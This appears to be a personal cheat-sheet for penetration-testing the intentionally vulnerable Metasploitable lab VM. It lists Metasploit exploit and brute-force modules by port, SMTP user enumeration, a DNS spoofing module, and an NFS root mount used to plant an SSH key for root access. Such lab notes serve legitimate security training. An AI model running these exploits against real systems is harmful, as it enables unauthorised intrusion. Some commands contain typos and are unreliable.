Metasploitable OS Complete Solved

Port 21 & 2121

# Searching the ftp version
auxiliary/scanner/ftp/ftp_version
# Exploiting 2.3.4 Backdoor
exploit/unix/ftp/vsftpd_234_backdoor

### Port 2121
systemctl postgresql start
auxiliary/scanner/ftp/ftp_login
> ftp <ip> 2121

Port 22

auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/ssh/ssh_login

Port 23 & 1524

auxiliary/scanner/telnet/telnet_login
### Need to use Wireshark to inspect login credentials

ncat <ip> 1524

Port 25

# SMTP
auxiliary/scanner/smtp/smtp_enum
## Veryfying the users available on the internet

nc <machineIP> 25(port SMTP)
VRFY <username_Enumerated>

Port 53 ISC BIND (DNS)

Port 53 is used by DNS (Domain Name System).Berkeley Internet Name Domain DNS takes care of recolving human readable 'host names' into numeric IP addresses. A commonly used DNS server called BIND has had a rich history of security problems. As a result, BIND and port 53 are frequent targets and a couple worms used BIND exploits to propagate.

https://www.exploit-db.com/exploits/6122/
auxiliary/spoof/dns/bailiwicked_domain

Apache HTTPd 80

It is used to host the DVWA on the metasploitable OS but it also can be exploited.

nbtscan -r IPrange/24
dirb <ip>
http://<ip>/phpinfo.php
msf6> auxiliary/scanner/http/http_version
cadaver <website>/dav/
# A Linux terminal should pop-up

PORT 111/ 2049 RPC Bind

RPC - Remote Procedure Calls NFS - Network File system

rpc info -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys 
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs <ip>:/ /mnt

### Listing the filesystems
df -k

cd /mnt/root/.ssh
cp /root/.ssh <filename> /mnt/root/.ssh

### To make ssh connection we need to extract the ssh authorized
key pair into the known authorized file

cat <publickey> >> authorized_keys

ssh -i /root/.ssh/<file> root@<ip>

Port 5900 VNC Viewer

auxiliary/scanner/vnc/vnc_login
vncviewer <ip>

Port 139-445 NetBIOS SSN

auxiliary/scanner/smb/smb_version
exploit/multi/samba/usermap_script

Port 512 513 514

These ports are also known as the remote login r services which is able to log in the systems using TCP Wrapper network access protocol

sudo apt install rsh-client
rlogin -l root <ip>

Port 1099 Java RMI server

auxiliary/scanner/misc/java_rmi_server
exploit/multi/misc/java_rmi_server

Port 3306

auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login

# On bruteforcing we get the password

mysql -u <user> -h <ip>


### Some Mysql Commands 
show databases;
use <database_name>;
show tables; 
describe <table_name>; (Select query)

Port 5432 Postgres

auxiliary/scanner/postgres/postgres_login
<default postgres pass>
psql -h <ip> -u <username>

Port 6667 Internal Relay Chat (IRC)

service postgresql start (IRC Requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built to prevent flooding 
Show playload 
set payload to ruby

Port 8180 (Unknown)

Port 8180 is used by the Apache tomcat service to run the java codes on the go....

Default password list github for apache tomcat based logins
exploit/multi/http/tomcat_mgr_upload

~ Ghoul

PreviousBattery Charge Threshold (Linux)NextTricking Windows

Last updated 10 months ago